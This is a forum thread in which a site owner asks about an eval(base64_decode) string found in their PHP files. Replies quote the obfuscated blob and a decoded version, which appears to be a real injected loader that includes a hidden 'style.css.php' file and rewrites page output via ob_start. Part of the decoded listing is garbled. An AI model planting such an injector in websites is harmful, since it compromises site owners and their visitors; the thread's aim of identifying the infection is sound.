Hi whats this i found on my php files? ...eval base 64 code string ....any ideas? thanks

I can't say for sure unless you post the code (which you should always do when asking a question like this).

I think what's going on is that, whoever wrote the code is trying to obscure the content by encoding and decoding it. That's my best guess based on the details you provided, if you post the code I'll be able to tell you for certain.

By the way, eval() evaluates a string as PHP code.

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXsk R0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG 9tZS9mcmVlYWMvcHVibGljX2h0bWwvZm9ydW1zL1RoZW1lcy9j bGFzc2ljL2ltYWdlcy90b3BpYy9zdHlsZS5jc3MucGhwJykpe2 luY2x1ZGVfb25jZSgnL2hvbWUvZnJlZWFjL3B1YmxpY19odG1s L2ZvcnVtcy9UaGVtZXMvY2xhc3NpYy9pbWFnZXMvdG9waWMvc3 R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21s JykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW 5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6 ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPT EwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIo JGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KX skaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7 JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JG grPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigk dT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb2 4gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzog bm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKC cvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2Uo Jy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKT t9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdv YmgnKTt9fX0=')); ?>

Our server got hacked into via ftp before.

The person injected javascript code into our index.html files similar to what u described.

If you didn't put it there, then that could be something to worry about.

Decoded:

PHP Code:

<?php
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no']))
{    $GLOBALS['sh_no']=1;
    if(file_exists('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php'))
    {
        include_once('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php');
        if(function_exists('gml')&&!function_exists('dgobh'))
        {
            if(!function_exists('gzdecode'))
            {
                function gzdecode($d)
                {
                    $f=ord(substr($d,3,1));
                    $h=10;$e=0;
                    if($f&4)
                    {
                        $e=unpack('v',substr($d,10,2));
                        $e=$e[1];$h+=2+$e;
                    }
                    if($f&8)
                    {
                        $h=strpos($d,chr(0),$h)+1;
                    }
                    if($f&16)
                    {
                        $h=strpos($d,chr(0),$h)+1;
                    }
                    if($f&2)
                    {
                        $h+=2;
                    }
                    $u=gzinflate(substr($d,$h));
                    if($u===FALSE)
                    {
                        $u=$d;
                    }
                    return $u;
                }
            }
            function dgobh($b)
            {
                Header('Content-Encoding: none');
                $c=gzdecode($b);
                if(preg_match('/\]*\>)/si','$1'.gml(),$c);
            }
            else
            {
                return gml().$c;
            }
        }
        ob_start('dgobh');
    }
}}
?>

Thanks er what do i do next? plz